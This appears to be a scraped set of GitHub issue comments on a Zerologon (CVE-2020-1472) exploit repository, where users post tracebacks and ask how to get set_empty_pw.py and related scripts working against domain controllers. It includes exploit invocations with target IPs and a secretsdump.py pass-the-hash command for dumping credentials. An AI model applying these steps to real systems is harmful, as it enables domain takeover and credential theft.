risksense / zerologon Goto Github PK

I'm testing on a client, but the server is with ipv6, and the script is not working. Would there be another way to use this exploit?

Why does reintsall_original_pw use the same attack to logon? At this point the target's account password should be empty, can't we use the hash of an empty password to authenticate?

Anyone has any idea how to fix this issue?

sudo secretsdump.py -hashes :a656220101bf64f4768fecce5a4eb5fb 'REPUBLIC/[email protected]'
Impacket v0.9.23.dev1+20210518.120245.2e3cd7cd - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: SMB SessionError: STATUS_LOGON_FAILURE(The attempted logon is invalid. This is either due to a bad username or authentication information.)
[*] Cleaning up...

Solved

Hi!

The title shows every time I run the "set_empty_pw.py" script, but right after the 'error' your script says: "success! dc should now have the empty string as its machine password". But btw, it doesn't!

I've reinstalled impacket, with
"pip3 install impacket"
downloaded the impacket repo from source
"python3.6 setup.py install"
"python3.6 setup.py build"
"sudo apt install python-impacket"
I've tried to change all the "#!/usr/bin/env " to "!/usr/bin/python3.6"
and the script keep complaining on that "has no attribute". I wrote a python3.6 script using NetrServerPasswordSet2 and then it doesn't get error.

Traceback (most recent call last):
File "/root/zerologon/set_empty_pw.py", line 147, in
perform_attack('\\' + dc_name, dc_ip, dc_name)
File "/root/zerologon/set_empty_pw.py", line 123, in perform_attack
rpc_con = try_zero_authenticate(dc_handle, dc_ip, target_computer)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/zerologon/set_empty_pw.py", line 28, in try_zero_authenticate
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/epm.py", line 1328, in hept_map
resp = dce.request(request)
^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 880, in request
raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x16c9a0d6 - ept_s_not_registered

Performing authentication attempts...
Traceback (most recent call last):
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/transport.py", line 346, in connect
self.__socket.connect(sa)
socket.timeout: timed out

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
File "cve-2020-1472-exploit.py", line 126, in
main()
File "cve-2020-1472-exploit.py", line 123, in main
perform_attack('\\' + dc_name, dc_ip, victim)
File "cve-2020-1472-exploit.py", line 70, in perform_attack
binding = epm.hept_map(dc_ip, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp')
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/epm.py", line 1256, in hept_map
dce.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/rpcrt.py", line 801, in connect
return self._transport.connect()
File "/usr/local/lib/python3.8/dist-packages/impacket-0.9.22.dev1+20200921.175010.84c8d6a7-py3.8.egg/impacket/dcerpc/v5/transport.py", line 349, in connect
raise DCERPCException("Could not connect: %s" % msg)
impacket.dcerpc.v5.rpcrt.DCERPCException: Could not connect: timed out

what is the ORIG_NT_HASH，administrator NM hash，or $MACHINE.ACC:plain_password_hex？

set_empty_pw hits an error and is not successful see error below.

Other POCs worked OK

root@kali:~/Desktop/zerologon-master# python3 set_empty_pw.py DCNAME 10.102.9.46
Performing authentication attempts...
==============================================================================================================================================
NetrServerAuthenticate3Response 
ServerCredential:               
    Data:                            b'\x0c\x818\x9e\x86\xe34\xc7' 
NegotiateFlags:                  556793855 
AccountRid:                      1008 
ErrorCode:                       0 


server challenge b'\x0c\x08\xa9\x05\xb8SD>'
'bytes' object does not support item assignment

Success! DC should now have the empty string as its machine password.

I'm testing on a client, but the server is with ipv6, and the script is not working. Would there be another way to use this exploit?

hi
when i used python`s script received this error:
Performing authentication attempts...
Unexpected error: [Errno 104] Connection reset by peer.
This might have been caused by invalid arguments or network issues.
please help me